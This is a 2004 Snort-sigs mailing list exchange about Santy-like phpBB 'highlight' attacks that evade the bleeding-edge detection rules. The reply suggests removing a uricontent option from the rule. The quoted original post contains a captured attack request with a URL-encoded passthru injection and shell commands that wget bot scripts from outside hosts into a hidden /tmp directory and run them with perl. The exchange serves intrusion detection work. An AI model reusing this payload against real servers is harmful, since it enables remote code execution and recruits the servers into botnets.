[Snort-sigs] Santy (sort of ) doesnt trigger any rule

M. Shirk shirkdog_list at ...12...
Thu Dec 30 06:05:01 EST 2004


The bleedingsnort sigs are looking for viewtopic.php in the URI, followed by 
the highlight vulnerability. So if viewtopic.php is not in the URI, then the 
sigs will not trigger. If you wanted to alert on this traffic, you might 
want to edit the BLEEDING EDGE rules and take out the following rule option:

uricontent:"/viewtopic.php?";


Shirkdog
http://www.shirkdog.us



>From: Guy Marcenac <guy.marc at ...2146...>
>To: snort-sigs at lists.sourceforge.net
>Subject: [Snort-sigs] Santy (sort of ) doesnt trigger any rule
>Date: Thu, 30 Dec 2004 11:43:51 +0100
>
>Helo,
>
>I got an increasing number of attacks looking like santy. But they never 
>trigger any of the rules I use (official snort set 2.2 and bleeding snort 
>set, updated every night).
>
>There are seven different patterns (the most frequent is attached below). 
>The attacks come from lots of différent ip, which seem to have a webserver 
>running.
>They try to use an existing webalizer html page (wich itself contains 
>références to à viewtopic.php file). Off course, it fails.
>
>I'm not sure if this could really hurt if used with a real php page, but I 
>think so.
>
>I can post a complete sample of these atacks if needed.
>
>GET 
>/webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
>
>--
>guy
>
>
>-------------------------------------------------------
>The SF.Net email is sponsored by: Beat the post-holiday blues
>Get a FREE limited edition SourceForge.net t-shirt from ThinkGeek.
>It's fun and FREE -- well, almost....http://www.thinkgeek.com/sfshirt
>_______________________________________________
>Snort-sigs mailing list
>Snort-sigs at lists.sourceforge.net
>https://lists.sourceforge.net/lists/listinfo/snort-sigs

_________________________________________________________________
On the road to retirement? Check out MSN Life Events for advice on how to 
get there! http://lifeevents.msn.com/category.aspx?cid=Retirement





More information about the Snort-sigs mailing list